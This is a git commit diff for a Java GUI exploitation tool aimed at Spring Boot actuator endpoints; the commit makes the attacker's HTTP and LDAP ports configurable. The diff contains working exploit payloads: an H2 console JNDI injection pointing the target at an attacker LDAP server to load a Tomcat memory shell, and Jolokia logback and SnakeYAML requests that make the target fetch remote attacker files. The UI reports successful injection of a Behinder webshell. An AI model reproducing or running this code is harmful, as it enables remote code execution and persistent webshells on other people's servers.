支持自定义端口

Author: SummerSec

src/main/java/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java

@@ -1,6 +1,7 @@
 package com.drops.exp;
 
 import com.drops.exp.util.H2DatabaseUtil;
+import com.drops.ui.MainController;
 import com.drops.utils.HTTPUtils;
 
 /**
@@ -14,8 +15,10 @@
 public class H2DatabaseConsoleJNDIRCEEXP {
 
 
-    public  boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps) {
-        String boby = "language=en&setting=Generic+H2+%28Server%29&name=Generic+H2+%28Server%29&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F" + vps + "%3A1389%2Fbasic%2FTomcatMemshell3&user=&password=";
+    public  boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps,String lport) {
+//        MainController.lport.getText();
+//        String boby = "language=en&setting=Generic+H2+%28Server%29&name=Generic+H2+%28Server%29&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F" + vps + "%3A1389%2Fbasic%2FTomcatMemshell3&user=&password=";
+        String boby = "language=en&setting=Generic+H2+%28Server%29&name=Generic+H2+%28Server%29&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F" + vps + "%3A" + lport + "%2Fbasic%2FTomcatMemshell3&user=&password=";
         String path = H2DatabaseUtil.getJsessionid(target);
         String url = target + "/h2-console/login.do?" + path;
 
@@ -36,6 +39,6 @@ public  boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps) {
     public static void main(String[] args) {
         String url = "http://127.0.0.1:9096/";
         H2DatabaseConsoleJNDIRCEEXP h2DatabaseConsoleJNDIRCEEXP= new H2DatabaseConsoleJNDIRCEEXP();
-        h2DatabaseConsoleJNDIRCEEXP.hasH2DatabaseConsoleJNDIRCE(url,"127.0.0.1");
+        h2DatabaseConsoleJNDIRCEEXP.hasH2DatabaseConsoleJNDIRCE(url,"127.0.0.1","1389");
     }
 }

src/main/java/com/drops/exp/JolokiaLogbackRCEEXP.java

@@ -15,11 +15,11 @@
  **/
 public class JolokiaLogbackRCEEXP {
 
-    public  boolean hasJolokiaLogbackRCE(String target, String vps, String echo, boolean version) {
+    public  boolean hasJolokiaLogbackRCE(String target, String vps, String hport, boolean version) {
 
 
         String path = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/" + vps
-                + ":3456!/a.xml";
+                + ":"+hport+"!/a.xml";
 
         if (version){
             if (JolokiaUtil.hasMbeans(target)){

src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java

@@ -24,9 +24,10 @@ public class SnakeYAMLRCEEXP {
     public SnakeYAMLRCEEXP() {
     }
 
-    public boolean sendExp(String target, String vps, String EchoType, boolean version){
-        String boby = "spring.cloud.bootstrap.location=http://" + vps + ":3456/" + EchoType + ".yml";
-        String boby2 = "{\"name\":\"spring.cloud.bootstrap.location\",\"value\":\"http://"  + vps + ":3456/" + EchoType + ".yml\"}";
+    public boolean sendExp(String target, String vps, String hport, boolean version){
+//        String boby = "spring.cloud.bootstrap.location=http://" + vps + ":3456/" + "snake" + ".yml";
+        String boby = "spring.cloud.bootstrap.location=http://" + vps + ":"+hport +"/" + "snake" + ".yml";
+        String boby2 = "{\"name\":\"spring.cloud.bootstrap.location\",\"value\":\"http://"  + vps + ":"+hport+"/" + "snake" + ".yml\"}";
         if (version){
             String url = URLUtil.getROOT(target);
             if (EnvPost.isPostEnv(url)){

src/main/java/com/drops/main/AttackService.java

@@ -36,59 +36,63 @@ public AttackService(String targetAddressText, String httpTimeoutText) {
 //        this.infoCheck = new SpringBootInfoCheck();
     }
 
-    public boolean gadgetSend(String target, String vps, String gadget, String echo){
+    public boolean gadgetSend(String target, String vps, String gadget, String[] ports){
         SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
         boolean flag = VersionUtil.isVersion(target);
 //        boolean flag = true;
 //        String type = "inje"
         String env = "/env";
         String env2 = "/actuator/env";
+        String hport = ports[0];
+        String lport = ports[1];
         System.out.println(target);
         System.out.println(vps);
         System.out.println(gadget);
-        System.out.println(echo);
+        System.out.println("hport" + hport);
+        System.out.println("lport" + lport);
+//        System.out.println(echo);
 
         try {
             if (flag){
                 if (gadget.equalsIgnoreCase("SnakeYAMLRCE")) {
                     SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
-                    return exp.sendExp(target,vps,echo,flag);
+                    return exp.sendExp(target,vps,hport,flag);
                 }else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
                     EurekaXstreamRCEPOC exp = new EurekaXstreamRCEPOC();
                     exp.hasEurekaXstreamRCE(target);
                     return false;
                 }else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
                     JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
-                    return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,echo,flag);
+                    return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,hport,flag);
 
                 }else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
                     JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
-                    return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,echo,flag);
+                    return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,hport,flag);
                 }else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
                     H2DatabaseConsoleJNDIRCEEXP exp = new H2DatabaseConsoleJNDIRCEEXP();
-                    return exp.hasH2DatabaseConsoleJNDIRCE(target, vps);
+                    return exp.hasH2DatabaseConsoleJNDIRCE(target, vps,lport);
                 }
 
             }else {
                 if (gadget.equalsIgnoreCase("SnakeYAMLRCE")) {
                     SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
-                    return exp.sendExp(target,vps,echo,flag);
+                    return exp.sendExp(target,vps,hport,flag);
                 }else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
                     EurekaXstreamRCEPOC exp = new EurekaXstreamRCEPOC();
                     exp.hasEurekaXstreamRCE(target);
                     return false;
                 }else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
                     JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
-                    return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,echo,flag);
+                    return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,hport,flag);
 
                 }else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
                     JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
-                    return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,echo,flag);
+                    return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,hport,flag);
 
 
                 }else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
                     H2DatabaseConsoleJNDIRCEEXP exp = new H2DatabaseConsoleJNDIRCEEXP();
-                   return exp.hasH2DatabaseConsoleJNDIRCE(target, vps);
+                   return exp.hasH2DatabaseConsoleJNDIRCE(target, vps,lport);
 
                 }
             }

src/main/java/com/drops/poc/POC.java

@@ -1,5 +1,7 @@
 package com.drops.poc;
 
+import com.drops.entity.ControllersFactory;
+import com.drops.ui.MainController;
 import com.drops.utils.HTTPUtils;
 import com.drops.utils.URLUtil;
 
@@ -14,6 +16,12 @@
  * @Description:
  **/
 public class POC {
+     public  void Port(){
+         ControllersFactory.controllers.put(MainController.class.getSimpleName(), this);
+//         System.out.println(controller.getPorts());
+
+    }
+
 
 
 

src/main/java/com/drops/ui/MainController.java

@@ -22,6 +22,7 @@
 import java.net.PasswordAuthentication;
 import java.net.Proxy;
 import java.util.HashMap;
+import java.util.List;
 import java.util.Map;
 
 /**
@@ -78,6 +79,14 @@ public class MainController {
     @FXML
     public TextArea InjOutputArea;
 
+    public static TextArea ip;
+    @FXML
+    public TextField hport;
+    @FXML
+    public TextField lport;
+    public static String hports;
+    public static String lports;
+
     LDAPUtil ldapUtil = null;
     public AttackService attackService = null;
 
@@ -106,6 +115,8 @@ private void initConnect() {
         this.vps.setText("127.0.0.1");
         this.httpTimeout.setText("5");
         this.targetAddress.setText("http://127.0.0.1:9095");
+        this.lport.setText("1389");
+        this.hport.setText("3456");
     }
 
 
@@ -276,7 +287,7 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) {
                 this.logTextArea.appendText(Utils.log(ssti));
             }else {
                 boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(),
-                        this.vps.getText(),this.gadgetOpt.getValue(),"TomcatEcho");
+                        this.vps.getText(),this.gadgetOpt.getValue(),this.getPorts());
                 if(flag){
                     if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
                         this.logTextArea.appendText(Utils.log("  冰蝎内存马注入成功 !"));
@@ -301,7 +312,7 @@ public boolean connect() {
             if(!vps.isEmpty()){
 
                 // 判断http 服务是否生效
-                if(HTTPUtils.getRequest(vps + ":3456" ,"isOK.txt").getStatus() == 200){
+                if(HTTPUtils.getRequest(vps + ":" + hport.getText() ,"isOK.txt").getStatus() == 200){
                     this.logTextArea.appendText(Utils.log("HTTP Server Is OK!"));
                     this.logTextArea.appendText(Utils.log("HTTP Server Is Working " + vps + " 的 3456 Port!"));
                     // 判断 ldap 服务是否生效
@@ -326,11 +337,7 @@ public boolean connect() {
         return false;
     }
 
-    public void executeCmdBtn(ActionEvent actionEvent) {
-    }
 
-    public void injectShellBtn(ActionEvent actionEvent) {
-    }
 
     public void check(ActionEvent actionEvent) {
         try {
@@ -340,5 +347,12 @@ public void check(ActionEvent actionEvent) {
             this.logTextArea.appendText(Utils.log(e.getMessage()));
         }
     }
+    public  String[] getPorts(){
+
+        String[] result = new String[]{this.hport.getText(),this.lport.getText()};
+
+        return result;
+    }
+
 
 }

src/main/resources/a.fxml

@@ -57,8 +57,20 @@
                             <Font size="16.0" />
                         </font>
                     </Label>
-                    <TextField fx:id="vps" prefHeight="27.0" prefWidth="448.0" />
+                    <TextField fx:id="vps" prefHeight="27.0" prefWidth="312.0" />
                   <Button fx:id="connect" mnemonicParsing="false" onAction="#connect" prefHeight="23.0" prefWidth="84.0" text="连接" />
+                    <Label prefHeight="50.0" prefWidth="50.0" text="HPort" >
+                        <font>
+                            <Font size="16.0" />
+                        </font>
+                    </Label>
+                  <TextField fx:id="hport"  prefHeight="40.0" prefWidth="90.0"  text="3456"/>
+                    <Label prefHeight="60.0" prefWidth="50.0" text="LPort" >
+                        <font>
+                            <Font size="16.0" />
+                        </font>
+                    </Label>
+                  <TextField fx:id="lport"  prefHeight="40.0" prefWidth="90.0" text="1389" />
 
                 </children>
             </HBox>